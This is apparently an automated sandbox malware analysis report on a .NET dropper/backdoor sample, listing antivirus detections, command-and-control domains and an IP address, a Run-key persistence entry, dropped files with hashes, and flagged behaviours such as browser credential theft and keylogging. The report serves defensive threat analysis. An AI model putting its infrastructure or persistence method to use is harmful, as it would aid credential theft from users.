          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 652393 Sample: kyFBQxVbsg.exe Startdate: 26/06/2022 Architecture: WINDOWS Score: 100
          40 tuekisaa.ac.ug 2->40
          42 parthaha.ac.ug 2->42
          44 2 other IPs or domains 2->44
          62 Malicious sample detected (through community Yara rule) 2->62
          64 Antivirus / Scanner detection for submitted sample 2->64
          66 Multi AV Scanner detection for submitted file 2->66
          68 6 other signatures 2->68
          8 kyFBQxVbsg.exe 1 5 2->8 started
          12 Qerdo.exe 1 2->12 started
          14 Qerdo.exe 2->14 started
          34 C:\Users\user\AppData\Roaming\...\Qerdo.exe, PE32 8->34 dropped
          36 C:\Users\user\...\Qerdo.exe:Zone.Identifier, ASCII 8->36 dropped
          38 C:\Users\user\AppData\...\kyFBQxVbsg.exe.log, ASCII 8->38 dropped
          70 Encrypted powershell cmdline option found 8->70
          16 InstallUtil.exe 8->16 started
          19 InstallUtil.exe 2 3 8->19 started
          22 powershell.exe 23 8->22 started
          72 Antivirus detection for dropped file 12->72
          74 Multi AV Scanner detection for dropped file 12->74
          76 Machine Learning detection for dropped file 12->76
          24 InstallUtil.exe 12->24 started
          26 InstallUtil.exe 12->26 started
          28 InstallUtil.exe 14->28 started
          30 InstallUtil.exe 14->30 started
          52 Contains functionality to steal Chrome passwords or cookies 16->52
          54 Contains functionality to inject code into remote processes 16->54
          56 Contains functionality to steal Firefox passwords or cookies 16->56
          58 Delayed program exit found 16->58
          46 nikahuve.ac.ug 194.5.98.107, 49798, 49801, 49803 DANILENKODE Netherlands 19->46
          48 tuekisaa.ac.ug 19->48
          50 2 other IPs or domains 19->50
          60 Installs a global keyboard hook 19->60
          32 conhost.exe 22->32 started

          Source | Detection | Scanner | Label | Link
          kyFBQxVbsg.exe | 46% | Virustotal | | Browse
          kyFBQxVbsg.exe | 58% | ReversingLabs | ByteCode-MSIL.Downloader.Seraph |
          kyFBQxVbsg.exe | 100% | Avira | TR/Dropper.MSIL.Gen |
          kyFBQxVbsg.exe | 100% | Joe Sandbox ML | |
          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | 100% | Avira | TR/Dropper.MSIL.Gen |
          C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | 100% | Joe Sandbox ML | |
          C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | 58% | ReversingLabs | ByteCode-MSIL.Downloader.Seraph |
          Source | Detection | Scanner | Label | Link | Download
          26.2.InstallUtil.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          26.0.InstallUtil.exe.400000.1.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          26.0.InstallUtil.exe.400000.7.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          17.0.InstallUtil.exe.400000.8.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          0.2.kyFBQxVbsg.exe.2e0000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen | | Download File
          28.0.InstallUtil.exe.400000.5.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          26.0.InstallUtil.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          17.0.InstallUtil.exe.400000.2.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          17.0.InstallUtil.exe.400000.3.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          17.0.InstallUtil.exe.400000.4.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          19.2.Qerdo.exe.40000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen | | Download File
          28.0.InstallUtil.exe.400000.3.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          17.0.InstallUtil.exe.400000.7.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          28.0.InstallUtil.exe.400000.7.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          17.0.InstallUtil.exe.400000.1.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          26.0.InstallUtil.exe.400000.2.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          17.0.InstallUtil.exe.400000.6.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          19.0.Qerdo.exe.40000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen | | Download File
          28.2.InstallUtil.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          28.0.InstallUtil.exe.400000.4.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          17.0.InstallUtil.exe.400000.5.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          28.0.InstallUtil.exe.400000.6.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          24.2.Qerdo.exe.9a0000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen | | Download File
          28.0.InstallUtil.exe.400000.1.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          26.0.InstallUtil.exe.400000.8.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          24.0.Qerdo.exe.9a0000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen | | Download File
          26.0.InstallUtil.exe.400000.5.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          17.2.InstallUtil.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          0.0.kyFBQxVbsg.exe.2e0000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen | | Download File
          17.0.InstallUtil.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          28.0.InstallUtil.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          26.0.InstallUtil.exe.400000.6.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          26.0.InstallUtil.exe.400000.4.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          28.0.InstallUtil.exe.400000.2.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          28.0.InstallUtil.exe.400000.8.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
          26.0.InstallUtil.exe.400000.3.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
Source | Detection | Scanner | Label
nikahuve.ac.ug | 4% | Virustotal |
tuekisaa.ac.ug | 2% | Virustotal |
Source | Detection | Scanner | Label
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
nikahuve.ac.ug | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
nikahuve.ac.ug | 194.5.98.107 | true | true | | unknown
tuekisaa.ac.ug | unknown | unknown | true | | unknown
parthaha.ac.ug | unknown | unknown | true | | unknown
kalskala.ac.ug | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
nikahuve.ac.ug | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | InstallUtil.exe | false | URL Reputation: safe | unknown
https://github.com/mgravell/protobuf-net | kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/mgravell/protobuf-neti | kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/14436606/23354 | kyFBQxVbsg.exe, 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.597952189.000000000239C000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.610776047.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/mgravell/protobuf-netJ | kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp/C | kyFBQxVbsg.exe, 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | kyFBQxVbsg.exe, 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/11564914/23354; | kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354 | kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
194.5.98.107 | nikahuve.ac.ug | Netherlands | 208476 | DANILENKODE | true
                            Joe Sandbox Version:35.0.0 Citrine
                            Analysis ID:652393
Start date and time: 26/06/2022 09:43:27 (2022-06-26 09:43:27 +02:00)
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 12m 36s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:kyFBQxVbsg.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:29
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@18/10@117/1
                            EGA Information:
                            • Successful, ratio: 66.7%
                            HDC Information:
                            • Successful, ratio: 39.4% (good quality ratio 37.4%)
                            • Quality average: 83.7%
                            • Quality standard deviation: 26.4%
                            HCA Information:
                            • Successful, ratio: 98%
                            • Number of executed functions: 95
                            • Number of non-executed functions: 178
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Adjust boot time
                            • Enable AMSI
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 23.211.6.115
                            • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                            • Execution Graph export aborted for target powershell.exe, PID 6288 because it is empty
• Not all processes were analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
09:45:12 | API Interceptor | 38x Sleep call for process: powershell.exe modified
09:45:54 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Qerdo "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
09:46:02 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Qerdo "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
Match | Associated Sample Name / URL | Detection | Context
194.5.98.107 | zk6ZBXX1Ly.exe | malicious |
194.5.98.107 | 2i2qY5a93Z.exe | malicious |
194.5.98.107 | ZzoNsdoVBG.exe | malicious |
194.5.98.107 | bu3OeThpRl.exe | malicious |
194.5.98.107 | KcqH9eRVWL.exe | malicious |
194.5.98.107 | TZmDdSXSX9.exe | malicious |
194.5.98.107 | GeU9eHNGK4.exe | malicious |
194.5.98.107 | TtbGUPFHJ1.exe | malicious |
194.5.98.107 | KaouHjyjuw.exe | malicious |
194.5.98.107 | RTQFHtPW9x.exe | malicious |
194.5.98.107 | xXkS59OGX5.exe | malicious |
194.5.98.107 | 7STXNgZD3g.exe | malicious |
194.5.98.107 | 3RMrCj8dB1.exe | malicious |
194.5.98.107 | TWAueCcfK3.exe | malicious |
194.5.98.107 | VHp0AIIlQG.exe | malicious |
194.5.98.107 | Pvxc3y0WEe.exe | malicious |
194.5.98.107 | Rj8kKjt7fP.exe | malicious |
194.5.98.107 | HrcD1NM6Cc.exe | malicious |
194.5.98.107 | FCKjDKDgdv.exe | malicious |
194.5.98.107 | eScInnIuzW.exe | malicious |
Match | Associated Sample Name / URL | Detection | Context
nikahuve.ac.ug | zk6ZBXX1Ly.exe | malicious | 194.5.98.107
nikahuve.ac.ug | 2i2qY5a93Z.exe | malicious | 194.5.98.107
nikahuve.ac.ug | ZzoNsdoVBG.exe | malicious | 194.5.98.107
nikahuve.ac.ug | xZPhFJvfZh.exe | malicious | 194.5.98.107
nikahuve.ac.ug | bu3OeThpRl.exe | malicious | 194.5.98.107
nikahuve.ac.ug | KcqH9eRVWL.exe | malicious | 194.5.98.107
nikahuve.ac.ug | TZmDdSXSX9.exe | malicious | 194.5.98.107
nikahuve.ac.ug | GeU9eHNGK4.exe | malicious | 194.5.98.107
nikahuve.ac.ug | LF6Ay6prId.exe | malicious | 185.244.30.199
nikahuve.ac.ug | 9abTU6oWsK.exe | malicious | 185.244.30.199
nikahuve.ac.ug | B4Bd65Yr8j.exe | malicious | 185.244.30.199
nikahuve.ac.ug | vdP1iGsD6i.exe | malicious | 185.244.30.199
nikahuve.ac.ug | f9483RfaBQ.exe | malicious | 185.244.30.199
nikahuve.ac.ug | gkh3UnDFDj.exe | malicious | 185.244.30.199
nikahuve.ac.ug | pgzC7bbBhY.exe | malicious | 185.244.30.199
nikahuve.ac.ug | Abl9mKVK3M.exe | malicious | 185.244.30.199
nikahuve.ac.ug | F5G2c1KaGS.exe | malicious | 185.244.30.199
Match | Associated Sample Name / URL | Detection | Context
DANILENKODE | SecuriteInfo.com.W32.AIDetectNet.01.22642.exe | malicious | 194.5.98.245
DANILENKODE | SecuriteInfo.com.W32.AIDetectNet.01.967.exe | malicious | 194.5.98.245
DANILENKODE | commercial invoice and packing list.exe | malicious | 194.5.98.9
DANILENKODE | x8WpnKAlsx.exe | malicious | 194.5.98.212
DANILENKODE | Client-builts.exe | malicious | 194.5.98.212
DANILENKODE | Shipping documents and revised BL.vbs | malicious | 194.5.98.219
DANILENKODE | SEIjqoLyloVjnew.js | malicious | 194.5.97.3
DANILENKODE | zk6ZBXX1Ly.exe | malicious | 194.5.98.107
DANILENKODE | 2i2qY5a93Z.exe | malicious | 194.5.98.107
DANILENKODE | Electronic receipt #AMZ-HWRM-1605160622.js | malicious | 194.5.97.3
DANILENKODE | pendiente factura 2022.jar | malicious | 194.5.97.3
DANILENKODE | Custom Clearance Doc. AWB#5305323204643.js | malicious | 194.5.97.3
DANILENKODE | houdini.vbs.vbs | malicious | 194.5.97.17
DANILENKODE | fatura.exe | malicious | 194.5.98.231
DANILENKODE | uRfHl1hL84.exe | malicious | 194.5.97.203
DANILENKODE | Purchase Order SYD22061.xlsx | malicious | 194.5.97.203
DANILENKODE | Documents for your perusal.js | malicious | 194.5.97.3
DANILENKODE | sample listings skptpdf0842.js | malicious | 194.5.97.3
DANILENKODE | Documents for your perusal.js | malicious | 194.5.97.3
DANILENKODE | RMB_payment.js | malicious | 194.5.97.3
                                                                    No context
                                                                    No context
                                                                    Process:C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):805
                                                                    Entropy (8bit):5.360596073797118
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhIE4K5AE4Kzr7r1qE4j:MxHKXwYHKhQnoIHK5AHKzvr1qHj
                                                                    MD5:EBFA21D930F1B37DA9DDD9D7E276F9DE
                                                                    SHA1:E97B403CAA3A03D0E8BDAC6E66FFBE47555A38E5
                                                                    SHA-256:5B9B2A9380AFEBEC985FA5745B9354DBBD4C889542B3EFE5446D24E8430A3752
                                                                    SHA-512:13D58B48DB79A6D8A8851186ECD309BB22B859D1FC064B8E05108378F06A71110A1AAE5622E4C61DA201192809BE4910B86037BFC2E4F4261942D6E3EC11DC14
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                    Process:C:\Users\user\Desktop\kyFBQxVbsg.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):805
                                                                    Entropy (8bit):5.360596073797118
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhIE4K5AE4Kzr7r1qE4j:MxHKXwYHKhQnoIHK5AHKzvr1qHj
                                                                    MD5:EBFA21D930F1B37DA9DDD9D7E276F9DE
                                                                    SHA1:E97B403CAA3A03D0E8BDAC6E66FFBE47555A38E5
                                                                    SHA-256:5B9B2A9380AFEBEC985FA5745B9354DBBD4C889542B3EFE5446D24E8430A3752
                                                                    SHA-512:13D58B48DB79A6D8A8851186ECD309BB22B859D1FC064B8E05108378F06A71110A1AAE5622E4C61DA201192809BE4910B86037BFC2E4F4261942D6E3EC11DC14
                                                                    Malicious:true
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):14734
                                                                    Entropy (8bit):4.993014478972177
                                                                    Encrypted:false
                                                                    SSDEEP:384:wZvOdB8Ypib4JNXp59HopbjvwRjdvRlAYotiQ0HzAF8:UvOdB8YNNZjHopbjoRjdvRlAYotinHzr
                                                                    MD5:C5A56B913DEEDCF5AE01A2D4F8AA69CE
                                                                    SHA1:C91D19BFD666FDD02B0739893833D4E1C0316511
                                                                    SHA-256:1C5C865E5A98F33E277A81FCDADFBAB1367176BA14F8590022F7E5880161C00D
                                                                    SHA-512:1058802FCD54817359F84977DD26AD4399C572910E67114F70B024EBADDF4E35E6AFF6461F90356205228B4B860E69392ABC27D38E284176C699916039CFA5ED
                                                                    Malicious:false
                                                                    Preview:PSMODULECACHE......#y;...Q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1........Start-BitsTransfer........Set-BitsTransfer........Get-BitsTransfer........Resume-BitsTransfer........Add-BitsFile........Suspend-BitsTransfer........Complete-BitsTransfer........Remove-BitsTransfer........-.^(...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1....#...Set-AppBackgroundTaskResourcePolicy........Unregister-AppBackgroundTask........Get-AppBackgroundTask........tid........pfn........iru....%...Enable-AppBackgroundTaskDiagnosticLog........Start-AppBackgroundTask....&...Disable-AppBackgroundTaskDiagnosticLog.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Unins
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):22176
                                                                    Entropy (8bit):5.601138309758725
                                                                    Encrypted:false
                                                                    SSDEEP:384:5tCABCmzRYPvYAnISBKnLul/sp6vz1Nnqa9ZFtPV7I1WDuZ1v1I5+yYs:VgvBI4KLulcI7qOXNUvr+
                                                                    MD5:EA4826E83AF1B21101CE6F68EF0B55C6
                                                                    SHA1:0046E23F0CC87039F220713239AD6B86DE91ABF0
                                                                    SHA-256:279B8D0ADA726FE5DFB5E6A238E2FFD2FE1A16F971BCFB6B41E4034E0CB9AA88
                                                                    SHA-512:39BCC0A6DEA0B45B877F6DCEE5930E34C49B5034F56D0E08168CC525631DE76772ADA7DE79B28263240D4422AB47AF91E9A8917548E10224194D7B924D4C53EB
                                                                    Malicious:false
                                                                    Preview:@...e...........`...........>.3.0....................@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Users\user\Desktop\kyFBQxVbsg.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):735232
                                                                    Entropy (8bit):7.987468698438195
                                                                    Encrypted:false
                                                                    SSDEEP:12288:9IxCLALqCddwA7Pljw5ej79G72AUBV3xaTPqfH0pLbwfBnC7aCNsuAIi6:9IxAgWA79Mq7s7ZUFV/IwfKagsWi6
                                                                    MD5:972334F0C55D0AEAB0B32EFE41EA3470
                                                                    SHA1:E9097B5CD1F976ECAF0ACCEDF14F1D22BD72E6FA
                                                                    SHA-256:EB91BF1E2EB3877F0942CEF113BB0FB76E2C2FD2C2651DBF09F6DA6DF649E8FB
